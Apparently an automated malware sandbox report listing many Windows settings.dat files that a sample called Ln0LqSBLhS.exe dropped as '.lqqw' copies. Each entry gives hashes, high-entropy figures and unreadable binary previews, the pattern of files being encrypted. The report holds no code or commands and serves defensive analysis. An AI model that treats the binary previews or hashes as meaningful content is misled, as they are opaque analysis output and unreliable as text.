                                                                                                                                                                                                    Preview: _......\.R8....$._"..}G.O*.72..?.F.`...5S....Udr....|........U...:.2..f?\...n..Z%. .9..I....5G..D..*g...tT..&i...&Y.....srd...q4...d.....D. .......V......I..D..TQO..h&MY.Q.zKZ.l..R...*d&Q..1.../.j.%.). ...g......_+.....1...Z6...\*.^.0.F..dD.!.m....._..4.+.3..c/B;.$*...{._..q%G....A3.&.yv#..s...`..Hm...xC5d8....n.......T..n.,*..[b..3.kE..[..!..V.V.`.H$.....q.4........k..[..b.ji....X5....B.G... `.....@0..W.!1..q..K.[.!g..J~.\{.....r..s%...}..3riQ........j.OJ.8..l(~zXrV........W..D.4|....4.O.S..T.l.E[..h..~.J...+...U...lP..Y....U3.K.Z.*..8.a4.d.p>'.7..%./3.^.c;..?..A^.....5..`X....jxv..9.... C....N..Q;l%Sn...5.8d"..;....0.;.#3O..*/....e.I.F.!..f8....t....X<y....C[..JL.g.z..g...=...}.qx...|.G.2/*...R&..".|...2+.`..Y.Ed....#c..^.......d..%+..T......n..{......u..lR......qx..S.).1...cc.......(....._...{...Z...@...].xr.y{e..[...!.;..LM.P.-M ...P..`.....y........ha..+$.a.!(.....L.....?d..-z.~..-.`..6.\.ts.oQ.".....&.he..j..u.BpDZ!....^......S.....i
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PGP\011Secret Sub-key -
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975136242898774
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:BXc3eqpkvs6+aCeciCu89S71mS4thJmxNtT0M+J+EA:B/Ks+aCe+9S49TmxLT08EA
                                                                                                                                                                                                    MD5:5CB2F54619B8D1408E4AAB81A456987D
                                                                                                                                                                                                    SHA1:CEF9B0BF0A46D32E1F67D6D7A698345F63C20738
                                                                                                                                                                                                    SHA-256:2D3E8233620338E91BC68C82FEB17B4FD4C1738CCC1DD8306A567DAE1D96D08A
                                                                                                                                                                                                    SHA-512:0DE3764B43C702B20E2138397FAC13B0C277ECA131792D9FD5FAF13E46579D3F56BEB15B89A6E492DEA409FAAAC298F6D096EE0098FA0DB652E88A6C094C352D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....:...[F.....l. q...'......g.>TW...).".9...J.E>iN.4".j@.......@MF....z...@..h.../K..KR. ...{..;h.':..............&...s...d..~.......k....-.......V&.}....PVBN..[i&5>.N.G.w....}..+......(.FO.J}..Jv#.H|._(..9..t../..t..?.4k.M.?....Y7/.B:3..Cvg;....q<.G>_\..4..]1..oVq....R?H:.......G.~<[FB:.....+.....>.N....z..p<.X.g|R-g.....)....... .>.an..]PZ......K.....hS....1./`...(.....:..Y..'q....$.#..6#....T%...>.Dw..NM..7M2..Y...WQ...........K%..2.+.<.{I.J.ty::...+.j..=...~.....T..E.......(.Ao_.Gn.H1.Q./..f..m..[R......W...9FK...H.....2pm......kt..}......C...\Z...P|z..'..3[Z...v...4........eP..e.k...l..XfPM.u_../........M.a<o...\`.s.].E.F.}..xU3..EN|..LR"....x..br..C.8...q.|..0t.v..]..<Z.j8k;......N'.....=2.0&/3.[l..F.a......v...?.s.n.H9.[.E..c........@.i(......X.<.vtkx.e2..^$..:...#.n.2Q....d.S.g..l*W...../H.}......!..x.I...W...f.N..p....\$.q.a|..e'..d...;.9......4....zkiv...Ph....`F.Y./H "Sb.J.I...c...*....H..v.....LuV....T?D,.f...K.?X[..].X...Q...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978741553363721
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:bimSmaRl4Mj4IJBwT6VquOHzZ6Jk+x53uwEatZrf:CZAMjxBMPuuZF+x5eEtZ7
                                                                                                                                                                                                    MD5:FE482D9C8834260E1F43731B18435C91
                                                                                                                                                                                                    SHA1:6F35C55262CB774EAD15A59FD941B5980CDCC7B9
                                                                                                                                                                                                    SHA-256:878D7B83C704847D652637BC4080AA5FA7870F149681FECBB450D0B1B915029B
                                                                                                                                                                                                    SHA-512:24E15A8112084A3A7FAA4A5A4FB6FB02EA0EC6FB767DEADA3DC8400A031DC0609927BB3251F984479003EB3AC5FA534F9E3858C1AF221F77FF813A47EB90443C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..i. ....#.Jt.z.M..d..Cg`...q...E..2lK,`..iT.V.Z...K....X ....^..R.M...../...n.Q.H.Y..a.xk.?.kK|&.l..yH..%.2$...a..3...(...x......[.jX.)@'\....z<.Q.$.....k..e|...(.E.........tL$..*$..F./.1....../y...*.SD.1.7...E)^..H.7....UC~F.'o9\.....b..&.L.L......_8..h.u.A......Wx..n..3.V.z.`.F.G.4..%..c2......V..Y.&5.YpT..B..-...2/..J.!..,..,.C...q..H....*...z. ...u.....X.....a....#Z...PJ.7.o.m..@......"E.uI..S.{..../..Y&p].z5...I.!3i>+d......z...%.p.jx...&..LM.[....8;'h....n.G..b...D...q..G).$...z...X.{`..)..^.eD0J=../X.0..3..........D3..W......K........P...5..ri..c-.x..)..gk...c]..3...}....i.....M.6.27..0.".R.V{X.$.u)....k...5.}Z....{.3...E.T..f....?e...Z..Zx....<..G....j>.*9I.#...-?,.......=.-...U....S..I..ai.1>.)mM..)..u^E....~....@.U../~....-....W....r..`....zQ..x2p}.L.,.^J$@F.U.b.+sO...6.i.$..>iW.....7.K.c..;.55.4,.[..LM..WL,....C...9..D........7....%.;5.W..;..6l.Z...N8.[.....l..:.w.&.f...4.z..]vJ.7.....v...BG....y.C..P..d....z~...w.Z....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\InputApp_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:PGP\011Secret Sub-key -
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977364562353882
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:kVe8FLA3RJ6v8LKg2f/eUQWLKXnb65Jkq3xgJYn/:kfLA28LseYLenCLxeYn/
                                                                                                                                                                                                    MD5:AD5687E8702024F714BDC2BE1564C9E8
                                                                                                                                                                                                    SHA1:7E74039752CFE92A116CC087FAA88B2D8602D825
                                                                                                                                                                                                    SHA-256:99A9248167578FBEA0CC49F88256DE9D9BCA00BEFB8DE295F5C10FD52D522BB8
                                                                                                                                                                                                    SHA-512:83A14522C0764ED317F77D962AB63F503B52B50A234684237DA52B3B988C1F723D814797706A9081F520AE77909F34CEA295E2B5EEC84687D8D363877AD20B50
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..y'....1.z|....eC.....~....<....JAW.wRF.......'..z.z..L...+..)...-k.{i..uBh>c.L..0....k....1.5w|.yiMz~Q.y.Q...!......2...^]g.q.%.l, ..iHa.>k...:m...y.4c..P.@.3W3....Y.5.....|.......=..z.t&.........H...F.J.!......y..".m..o...mG-^Ru.nE,|.W..Q.%\<.!..B5..c...C.dE...nHY.m.e=>...7.'..c.B...........>.U.Y.......$_.3E..v-_......"!u-9G......3.B......*..R;..C..,.I...-I...M<.;..)._4m.>...^5.T..tKV.......h..^a..p...b..m.m.NG...Y%.OE.>+_j...h..F..~i......$.e......l.Z..x............W.."...HyW..r.,.[P.`M.tv....w.v.L9...I...T..,.Wv7..nb.]K...j..lP..8.B.Uy(..0I..,..iH..Y8.*".......'..O.=..!.dEoY........}.C..9...<..:#:...v..3..!$..:...\[......G.....]K......v......2..?.......*.X....}.%.#9%...o..0...W=...*.h_.............2.-....zp+...16-..e.."T....2..-.d._3#...$...@S.._-I....-pu.E..J........m'...iw|/[..Nt..kj.n...O.K^.Q..76.....ve.....R..m......u.+.*[.Wr...(osV.......N..[...jv..".......}.@zP.q.:/%..!.iH.^+P<{lx'..G...Ea....'X..a...J....4....U....4.G.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.981390576592673
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:qiwISB6KpRRJE5AtIwZmxpeGXrlGmw+lTaUThPEs2B7:qvIcpRXLZmKolNw+VFTE
                                                                                                                                                                                                    MD5:F549ABF0853F5F63C7E49F699C41CE99
                                                                                                                                                                                                    SHA1:4FEB12BF9F118C791C17BEA05DA5E91AB683EDEF
                                                                                                                                                                                                    SHA-256:C84FD5D696160558FF53EB7181FD73A481A44FEA26B9586D38E0289C909408BD
                                                                                                                                                                                                    SHA-512:E02670158FB230F3FADFE2FE2B7D2BD374AE770376227D9BA6B09F2A4A2B09702FAB03B84D579EA6B1E28F3FCAC6685230E17077D9534ED5BC829D871593024D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....Y.......y.O.s..V.a.E...9.FI=.a......O...>..$ZQ16.'/.gc.9r..ID..*.]....C.6....+.O.xE.D..LJO7R........dFb.U...aw...6.h..+.IY:.D.....Q.rV.#PVc#..F0....<....b/$....3c;........9.F\F.?.|.....`...b',.NG......._.B..E..'.J.qamD.._.g.u5..D...|..*.u..wS..k....0..B..d.%~..Wz..v...hA&...y.]..y&..Q...eU..W(,....i..w_..7..5.bk....h....T......s.H(..{+....._-.G....".+..^.{...}.5._e........+....y...G......Om.nN.(.C...,}..o..q.D..r..D?J5,..eM...6.4..c...,).T'..A.f...._.....F.ZX.D...7...^9..P.w.qMb.Y...!?U...P,.../ZaxM$.....t...H.TB|.!...C....@wA._.(/@v..D..Y...tWV..0...9....Y...,r...A..D_;...&F,.}A..+.#}."dr..#.....q.8..m=tdHh.JV@.TH.dI.n.$.P<..:pC.(....+.F..hnZ...._....y.gg#.0..r.|.$.8~f*.8...o........i.(7...........!.N...O.......OL"...0..wv5.D..X.0...mJ..\;..=.z.VW.a.4.>....Y........'K%vDE.k...<\....koX(...P.2.. ...M.......|....-]$../.....%..[a!O.V.m...L'.R.k....`..T....B...:M..D....B.Y.*...Rx...m...\...w.P.......s.N..5O.d.............w......x[...
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9773212683668495
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:F3Z5nd/9BjPJbv7BNAZaQM54d6lC1OerCn+EMS9TT43k6XAKpF6QH:5Z5nd/PjR8MtgZ1lC/J9n41QaIK
                                                                                                                                                                                                    MD5:E6FC5CD6E6416BACF9B8F1FCE9BA8536
                                                                                                                                                                                                    SHA1:42A6CCF8CB8FAB57EE8C3D05A429D557A2193922
                                                                                                                                                                                                    SHA-256:2DED1290BA939688891540A604B5313F1C32155E68079300DD0E1CF2FF1550E4
                                                                                                                                                                                                    SHA-512:6A880C1BB0169BDFFBDC42A1A95B2B21994AC91BC93AF46E7D88822092F6478F3F619E90A0D024C5753292B6F323E0F209A292947A982E81322EBD501AFDDE2A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: FRw/..L"....#m...).......G.....(...=f.Z..:<.m.9....cM..<N.l.......][Y."....d.O...b....#.9Ca..H.......=hX.}2M.7A....-...R..K9.&R....uP<..../...2....L..".'>..2..3.R.N..rZ$...].}.V....A5.5.|e.P..5. =.%.1X..%.=..(.!"...#u..^K...n.......a.V....@r.R.....v3..^.tE..x.QR.Wz.a.#.1%<...TR?...G....e\..i.'...V..\+.u.P..B]v.#:...3.K.Y...v.p..kA........7..D.]...@...H.z.....[...1..n.k...j./.[?b.p.o.Q.{4f,,..~...5.!.(e..e#9.[.v..J..p.1..C...........H>..@d8......y9..=...CO}.......%N@..-H\.....A.j.................~.*#t...CeH..,%......!..1C.T..w./q-p..T..T..E....@...<..../R;P....}.|D.....2.......*....@.zc....hLC.)6E.N.U.784..X....?V2....G..d...4_...a...Zv.$.j.lD.................2.S..H.9......F.zf7Q.d........G...<.G..^.'..dc..C,=..q............0J...&.k.^.y..yY|....s.......|.Q.........aC...y....oq`1...\`....@...\.....aQ....m..e>....p.R.jW...:(...-..G...?7......l.>q.....;a.0s.......j....@.J....$.G.A.V.}..y.;.D...?..|.G.6..!..K.~...hy...Zf1.....S....&.T
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:zlib compressed data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978990357073084
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:wAgVJQ97CSs+s5HYLqa/qxIkSqiFeuiEGB3E4I7iHkC5hiL:wa9ktE/qJiFyEGBU77iEC7iL
                                                                                                                                                                                                    MD5:90819341D6ACC36733383A93023E9E5C
                                                                                                                                                                                                    SHA1:538A2BE63C7E010EAAA222A26E1A91FD47A1DB9E
                                                                                                                                                                                                    SHA-256:BBC5F2813EFEC448BF0050262952E1EBC44E3517D046D503E8F5B895C44EEE29
                                                                                                                                                                                                    SHA-512:04FDF84FC524B1B16D30F42235B1CDEBBBE490D2793AB408499623949020234C880B4318CEC73A0C9DD79B230239371907696A9AF7432EBEAADD664EE9399BC2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: x}.......,.Q.>3yc..3..1#....x.........$G.-"....&...z%.o\X......}*...L.5..p9^..."=6a.:3.,./..T.Y.....1.T...$.....N...}.-..'..Y.1kaF..J..}...*.vN?$3F.-....m.V...|>oI..4 ..j........]..j+..u.^Y...v.[..3.NDyFOJ......uFS.._h^.M.5.\s..Mv...:..q......t;......7.!+i.`........-/6N(...S).LoX.i..h./8V...E.o..Vl.{.=.W:F\.&c.pj.....K.N..U....4_......R.....C.!.......*..gl|1.#.8.. ....\#W.....]Wk,.qI)..(...L+..D#Fh.9...[..0.P...f.]j...06... ,0/.5.........l...=Uw.$../*}.@1..g....I..m....<.H..h=..,r. .k..;..2...w..ZS...dC.5.+.....0?..i2.o.1.2...-..*..>..qTq.hy..E...cie..S...........4%.v..^=...YQf."e....(..."[.)..x.....\.*.c........4>.._............JA5g..Y..Mo..P.3Y8..;.{..f...(._F.)R......l...]..*".....l.z]..R.................8b.`..T.....W..f...x.D...+?.#.....P.>..,...+.Da...K.!.~.".....&.W.>@..`...lZ....R-.%.;"..b,.,...h@.a.._.=_./....)..NG..I;@..O.3..1.K...v.1......K.BOV6...9...;Z.cr..x....](~h.....pP...Y_..{.i3..W.rH..*.$.d..*.].._.p...w[v........F3._F.....
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97363157226443
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:RF/jTBNHaip+b85MZsKtJImIoVJvLALBqgzpKYaYtbz1ul4ahLELGy3ALy/6i:RFrTBDpSAMZztJTIob8FKnYtz1u7ELGK
                                                                                                                                                                                                    MD5:482D7448F67BD6716B024D5B6F751706
                                                                                                                                                                                                    SHA1:B2130BDF09D6D8A6284E833D9B22D5D138AF17C9
                                                                                                                                                                                                    SHA-256:D32ACF26FC65DA7CA217020FE443E0B1471803441A51E561E50859C0B5A32091
                                                                                                                                                                                                    SHA-512:E3C040D516006786F6B7D694D1904C9E9636456299C5F91793026B74896C8913E098B90849F3471C92BC71CD5BE55E7B4CBB68FA61FE65CEA68E49801D84B53A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Z...q.b..u.!...G..(.5..TRH.V.....'..W...H..<....o..hw..........L'..j .a.0q......2r?U."T..S....y<D..aN..j.j..@?.+.X....c.e...6.......^..gM...S7...2FF....a...<..9..,..cO.s.x<.....cF....\..._.|.....d4..nP..m.3..B...n..Q_;...4....f.^..7...4..F._.......1..8BM.c.....~........"......D].S.D...|...g.....\..Ihz...X....#..M..ID>.3...!.w'.P.%=n..yG..s....iM.7W....ypz......v..>..es...~^F.../..D...B....B.......r1$&-..8t..FU.O4y;..p.t.>}=4......U.......$.X$9..\.`........Na.>....j.@\F4......^kW..'....w.......,.=??2.;R.*`.;........a.kw.I...b.o".$2..Z..5L..=.u-8.t.z...;.+..d.n1....y.?|[.ZV.'_q...jZ..!..0.:........J~Hu....QM.$54~..+..x......k.7.....-..8...54.._...g.+.raj9.M.......f3.0...b.$.>.....Z...w..6HL..tR...kY..K..^...V.Z\.@..J8....e....ULcjm...u...uy.......zN.v]8...m+....z[w........+.jK.9s..K...$......1.>..Sb.Ua@-.%7.+tw.7.F.].}.H.....!.....9_.....?.iU=......%..z_0z......N.EQ....K.........2#)....~......O7..|P......uE...a...AI-.A';2.eu`..6.?..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG1.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97717328390185
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Y0e4CIkLGLNejXW6zfcE1EoMeZuAJKByrAE:Y01vkLGLN8DzfcE1qiQS
                                                                                                                                                                                                    MD5:323A3C6ABB3F41C44197C24304BC26EE
                                                                                                                                                                                                    SHA1:803CAC69A1DCE8F7163CA4F7B0DA91758B47900E
                                                                                                                                                                                                    SHA-256:73D1C1DDC753C543F2C18A6D5FECE5E8CEBED9AF5E593022F581B7908E301BCB
                                                                                                                                                                                                    SHA-512:FCA4655E336C3CEBA10A7681A1EDE91826FEB6705C7C8F211DA5A6D8BDF7BE7A2D8805F412BD1A77CD863390B93FB2FAFA40B528163F872858D4CA1D1A18C558
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..xVB.#..,-O.4j.A.g..`...8-....Y/...|V.F..A.xv..bt|...F....t......C%.F...}.,.'...3.4..^.....G..|_..W...!....3...5'...BM...N\.)A..^.*A.?..0.H..Ei.......4..S..F.b'N.b..;.m`6N1..O.G.t.K29....^k.....4..-....".$...:..4DU.!...".Ez.{.........o+f..%~.>..oK.${&..;"..4..E...~...b...%.._..3.].4.....'./!.R....Z....a.'......wR..p...y..G.....u}....C..k0jfu.4....w..%...A...N.....s.@E5~.?=...._^.Wy...r...lB.|>........(....R..jV.%}.x.v.......$..>..D....w.A~..</.J.....0......Br..k%..W~./.m.l.."...(......H..X...MN.J<1.z..W....5............J.X...k!`ign@r.J.P6 .+K...j...[..{..?+.H._..........R..%....e._..6$.U.......h4.86...<......N.a.x..G..........q..d.#.....'.k$9.l.H....}gf.:Z...;3Y../<.'0l..o.)6?.?e.[=.2D..r.F...W_...Zj...W..*.7i..'...B.<+......b.........V..qT..a...fo;..?..V..j1.t........}rM...X.O.{.C......fo.eS....Q.....KR....,:.f@...O.|5T..$.bh......[W...M#G.=G.t..k........0S...[i..G^/...0"".[.z.p.\[.=.2.u.#f..zlU.b.G.......>..yPHd+LK..Ux[.wR..o...9..
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.980731460712496
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:z+RM24v+l2//9nJBWnc6MSeVjHH70BNTWTc/Hajk:gM2VlC/9nJBWwHb2BhT
                                                                                                                                                                                                    MD5:FF19E20DBFFF9A51301C66A6DC7C3BDA
                                                                                                                                                                                                    SHA1:4E154717F9727E75662BDEC7516992DBBDF99695
                                                                                                                                                                                                    SHA-256:12D671CC17A6AC9DA64FADD9FEBE5512A641CE83A73D35DC3174A4D3146FE687
                                                                                                                                                                                                    SHA-512:E1E14CCE8DBC7EDF5A7B1BC270BD35F0325A6C39327F0599633E0234847A797C70D906A634F2D70FA21C0F813F071C02192B4E18A0097BDC2FA51CEE53C2A77C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: S.......VO..3.\.,O...)..WI.f..[.zi......M+.......u.v..0.]#.w...T.*w.^...h.......g.%....Z..*C....~....3...*.*......;..'.@dN.%Y.p1.6..,...~..e.2.Z.. ..,....N....n.]zs...i..#.1#..4.}.J...Q.....r.O\W..o.*"R.e.z......uX.a.<..x.c._..).72..H.QZ..(,.`..=lK.........Uu...yFj..>.c.....2J.gs...j..h=?:.;8$.1.^..j....L5..J.^T....5^S.K.1...%.....7..Rl9C......@......c7...@:%.G...GS....6y.....k...I}.......a$..'..p~.C.).".p./.H...d..n.j3..5.......R.M.5.n........[..-=V{sl......u...f.K3,.d_..E...Y.4.i.j,..z.`...5.*....j:W...Qx......_r...E....u...B1...i...........B.1.X<P.K..&i...6...Bl..C.=.=N....A.hI..8fx^...........3...$.1...4]..3..].?...d.^...C..[s..#.r(....AP.{.......-.M@.X...)B8....A....N.[.;@..?c......+.w.8dJ...J:.Y.x.C.@{fr/..$...4....U.&....NtP.q........e1.... 5..I.'.......\.7..s.<.'..c.f....#.....m_..L?......h.....UD....X.*=C...x.9.g.8|D.N.p.)v..#....>......./s.....[..cL..w..^B...0.~~.....k...X.....d...9...H....A........;.s.I.a.].(...=..w.......
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975043869596671
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:hK1kjGH+KtqDp8O+K0iNsJaNqGkR3vpRI1u6yNcM8sQe4:1yv+p3NsQNqGxC8s2
                                                                                                                                                                                                    MD5:37E1627B621F4C36C32A823503C70573
                                                                                                                                                                                                    SHA1:4FE741B2D126125B46AAC74BCE294458E6CCC513
                                                                                                                                                                                                    SHA-256:628E5FF46542F83EA2591B0701105584DEEDD290BB01B5EC2EC599FAA6969559
                                                                                                                                                                                                    SHA-512:7102C9EC50C3487E3F10FD82283B1FA51E9EB81B0490CC2C9CD4E931E6F37074432E9E6AC7BDAD40292E045C3126E64ABDC203E225FDDC8DB0B83EEF818EB549
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: N.|...SHG....Vi.l._.."6..2x,Yv...6A..4..~.....J..Q5p9.j...4..I.t.x."n.,.l.......?Y"..]..c..2.q.P..@.$..[WQ.'..fV..J..<...F.../.....>do<#W.+..T<<...h...xt....t.e.L.[...?...E..).Sl.g.....VV.R.M..."..k.]so}....?.I....6...^.k..z..].i|.D..C?{.....{.im........0EU...:..A.J.n..+...U.|.5..g)F".FI..Z.FO..@/..E.k...........?q.z.cQ.d...Fm2e..[...T.S.K.o.Y.>.....2|...aK....#..a.m...O.v._.G@Hh.vO..$.Y'.......'..j__.....AQ%'A..<V...7...$.:..)....p..H(wA.[..;;l.;..Z.._`.}m.M...<.........#..B..=-.$.........\.A...v..M...U........3t1o~p..2n.D.O).....URw......#h...Y}.=...Wy!.".."B..GC...h+.J...sU. .X$9:...g.t.I.....9m..y...k.....2-.M.h.B1j@....&..`.B.U.l..a.>....j.~WV_..`0....w..<......8...2].i...>.]7...?..../}W....6..[f7g..j..==xm... ...,[.Og...EG...~6..Rh..A ....Mo....Z9..>>OK#......Ed.fY....GF.....&...-..$P.u......i.fjD"'Y_o.p@.,bZ.b....ZB... ..Z..\=Fy.6NW.0...} u...kVz..a.......3..J<..t..U\.3...,c. .He...x..T....PD(....]<)R~a...s...8.^.p........D....W.
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9746568966298685
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:epOcpxsvT/io9LFW0avsnFscnxInr7eWQgeYimCJsyBXNYRpd9CBd:rjvLioHjFr67eWQFbmXM07cd
                                                                                                                                                                                                    MD5:B67EF984351DA2636716B25CF9260750
                                                                                                                                                                                                    SHA1:1AE2CA426EFD026FC415AAAE422C52F73983A5F3
                                                                                                                                                                                                    SHA-256:E093BA4E7AE6343CD1BC59F2E88E4E232B4F6CC455B0B25A921779D3828C837A
                                                                                                                                                                                                    SHA-512:C339D43AB0F8AD3B42E7E2805D391372D34335C727BB1C58441379EB50EF622F94EB5F268E5F0E61702BA48620F4012E16207FE56355F5A7F08113593C0124AF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: :.Q..\_'v~.`K....?..*.K.em....../.K...ZHd....<.g.V..A.{.y"..Zo.K....i.FH\...3...27...2....g.H4...F.g..E./.j.g.r.......@*....C.k.>.;d^..TQ.F..@...!.L^.@;.s`O..~.30...z....R.......=...../(!.N.....h...y.[.....{8F.....\,....7..5;_6>....[.p/.......il2.#{H..]06..,.}..C+.....P...A..m.E(..<....CZ...[..-.np....(?.p........ \.1..T....R?m.s...k.U..H1W....g.Ew...qHO-..X..d..;.>.x.......r.TW.?......n.re"....c...'./...7#A........ThZ....@.fLb.Q/..D....AG/ioX"..n.........1.v.c.B.........D+&.H/.O...:$..".`g.l..B..+...Ki......h#..?.....)..lt..kW...g5.g4m8.\......4&.C...V.b.'..[].....v..E...'.....dT...2....m.......w..V..Y.%%f...SA....R...0.:m..7m\_.bx'..].....3ES.M........7...^N....w....'....6.:..R......N.e.[R[[.e|....4..A0.YrNH..VH...R..~.!.w..w...s.\...2=.].po...~.AE.q9.~.#...P..8.s.El..>.c...Ss_..3...x....3.0Qjk..2.l...%7.<..+...+q..>..E.....^....)6...gW..N......1..$y.l..Gg.....J....<.q\4.9..?..!....D..w...<.,...o.j..........Y..Sd;B..K-Bx.M.]..n
                                                                                                                                                                                                    C:\Users\user\Local Settings\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\settings.dat.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97951075794296
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:At7KfmpgOyk5qOF0S/IjnddSHLlUkIdJZ+9ffXW9bHXZAnxq:At7K0wk5qKIjdEI/ZcffXSXcq
                                                                                                                                                                                                    MD5:11C97960CFC4F96016AB7AECA5CABFB8
                                                                                                                                                                                                    SHA1:D2DC8AF070A73CD61826E7451549A5ABD1D47675
                                                                                                                                                                                                    SHA-256:4713BAF80049F0801EF9D804CC7729695A2D5A47F6E36389F7E6C0B05E24894E
